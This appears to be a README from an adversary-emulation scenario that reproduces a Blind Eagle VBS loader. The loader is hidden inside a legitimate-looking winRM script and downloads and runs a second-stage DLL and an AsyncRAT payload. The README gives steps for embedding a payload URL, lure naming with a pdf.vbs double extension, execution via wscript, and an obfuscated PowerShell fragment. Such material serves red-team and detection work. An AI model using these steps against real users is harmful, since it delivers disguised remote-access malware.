# VBS Loader

# Overview

Blind Eagle is known to use VBS loaders as a second stage or later loader of malware infection^1,2,3,4,5. The loader for this scenario is based on a variant used in more recent campaigns. The VBS loader is hidden inside of a seemingly legitimate winRM vbs script. The purpose of this loader is to downlod and execute the second stage DLL, and is typically also targeted for persistence by the second stage DLL loader.

# Usage

The loader should be populated with the correct URL for the final payload on line 344. The file-ops.py script has a function to encode the URL properly.

Typically the vbs file will be named according to the current campaigns pretext and use a double extension such as pdf.vbs². In some instances the payload will also be compressed into a .uue file or another type of zip/compressed file^1,2. Simply double clicking the file will set off execution.

To execute via CLI:

wscript.exe .\eagle_loader.vbs

# Troubleshooting

the VB loader can have issues running the PowerShell script due to the Unicode characters. Ensuring that the VB loader is saved with UTF-16LE encoding will allow PowerShell to run and parse the Unicode URL on line 344 properly.

To save the file as UTF16-LE You can use Visual Studio Code - in the lower right corner of the window the encoding should be listed:

If VSCode shows a different value you can click the encoding and choose "Save With Encoding" from the action menu:

# Build

Run file-ops.py with the -u flag to generate a URL pointing to asy.txt (asyncrat payload) on your remote host. This will save a file called url.txt in the current folder

py.exe .\file-ops.py -u http://<url>/<to>/asy.txt

Open url.txt in VSCode and copy string into line 344 between the single quotes just after UUkXaLU = "e').G44☝░@4�tM44☝░@4�thod('VAI').Invok44☝░@4�($null, [obj44☝░@4�ct[]] ('

# VBS Loader

# Overview

# Usage

# Troubleshooting

# Build

# References and CTI